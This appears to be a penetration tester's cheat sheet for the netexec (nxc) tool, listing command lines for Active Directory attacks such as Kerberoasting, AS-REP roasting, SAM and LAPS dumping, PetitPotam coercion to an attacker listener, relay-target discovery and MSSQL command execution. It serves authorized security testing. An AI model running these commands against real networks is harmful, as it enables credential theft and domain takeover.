netexec (nxc)
nxc "is a network service exploitation tool that helps automate assessing the security of large networks." Check out the BHIS cheat sheet on this topic.
Generate a hosts file
nxc smb 10.3.10.0/24 --generate-hosts-file hosts.txtAppend the generated hosts file to your actual /etc/hosts file
sudo cat hosts.txt >> /etc/hostsCheck for vulnerable certificates
nxc ldap domain.com -u user -p pass -M certipy-findCheck Machine Account Quota (MAQ) value
nxc ldap domain.com -u user -p pass -M maqBasic SMB auth
nxc smb somehost -u user -p 'Winter2027!'Basic SMB auth (Kerberos)
I like to use getTGT, then export KRB5CCNAME=user.ccache and then here are some enumeration examples:
Connect to host with SMB:
nxc smb server.domain.com --use-kcacheTurn on logging
To log every nxc command and output to a file, find the nxc.conf file (in my Kali it was at /home/kali/.nxc/nxc.conf) and enable logging:
log_mode = TrueChange the Pwn3d label
You can make that something more professional if you want - just edit the /home/kali/.nxc/nxc.conf file and change:
pwn3d_label = Compromised!ASREPRoasting
nxc ldap dc1.domain.com -u you -p 'Arnold123!' --asreproast asrep.txtKerberoasting
nxc ldap domain.com -u lowpriv -p JingleAllTheWay! --kerberoasting kerbs.txtIf you have a ton of Kerberoastable users, you can see them a little easier if you grep the output to include just the usernames:
grep -oP '\$krb5tgs\$\d+\$\*\K[^$]+' kerbs.txt | tr '[:lower:]' '[:upper:]' | sort -fuFind shares
Filtering shares
If you want to find just READ/WRITE shares for example:
Or just WRITE:
Cleaning up share list from log file
If you've turned on logging (see top of this page) here's a way to grep out just the shares you have WRITE access to. This is helpful if you want to try and drop tricky farmer payloads.
Find hosts with/without SMB signing
nxc smb pcs.txt -u '' -p '' --gen-relay-list nosigning.txtFind hosts with/without SMB signing (alternate way)
grep for anything where signing is set to false
nxc smb pcs.txt -u '' -p '' > signingcheck.txtIf you want to get kind of fancy-pantsy you can take that grep to the next level by pulling out all hosts with SMB signing disabled and sorting by the host name:
cat signingcheck.txt| grep -i "signing:False" | awk '{print $0 " " $4}' | sort -k4,4 > no-signing-for-these-folks.txtFind hosts running WebClient service
nxc smb somecomputer.domain.com -u lowpriv -p 'yerpassw0rd' -M webdavFind pre-created computer accounts
nxc ldap somecomputer.domain.com -u lowpriv -p 'winter2026' -M pre2kDump SAM database
nxc smb VICTIM -u lowpriv -p 'Winter2026!' --samCoerce authentication
The nxc wiki has an interesting page on this - talking about the various ways nxc can coerce authentication.
NOTE
Instead of using the METHOD option, you can use its short form M. Similarly, the argument LISTENER can be shortened to L.
This also applies to the names of the vulnerabilities when specifying a method.
M=p // Invalid, as both petitpotam and printerbug start with ‘p’ so modules gives error
M=pr // Matches printerbug
M=pe // Matches petitpotam
M=dfs // Matches dfscoerce
Coerce via PetitPotam:
nxc smb SOMEHOST -u user -p 'pass' -M coerce_plus -o LISTENER=MY.KALI.IP.ADDRESS METHOD=peAdd computer to the domain
nxc smb domain.com -u arnold -p JingleAllTheWay -M add-computer -o NAME=YOURMOM PASSWORD=Omglol123!MSSQL commands
Lifted from the nxc wiki
Execute database commands
nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'Get/put files
Get:
nxc mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\some\\file\\in-a-subdirectory\\file.txt /tmp/filePut:
nxc mssql 192.168.212.134 -u administrator -p October2022 --put-file /tmp/users C:\\Windows\\Temp\\whoami.txtExecute commands
nxc mssql 1.2.3.4 -u localdbuser -p 'Winter2026!' --local-auth -x 'dir c:\'Dump LAPS passwords
Using an account with rights to do so:
nxc smb VICTIMSERVER -u user-with-LAPS-reading-rights -p 'YerP4$$w0rd!' --laps Check LDAP channel binding
nxc ldap dc1.domain.com -u myuser -p 'MeowMeow123!' -M ldap-checkerDump PowerShell history
nxc smb 192.168.1.5 -u user -p password -M powershell_history -o export=TrueSee who's logged in
nxc smb 192.168.7.7 -u user -p password --qwinstaList running tasks
nxc smb 192.168.7.7 -u user -p password --tasklist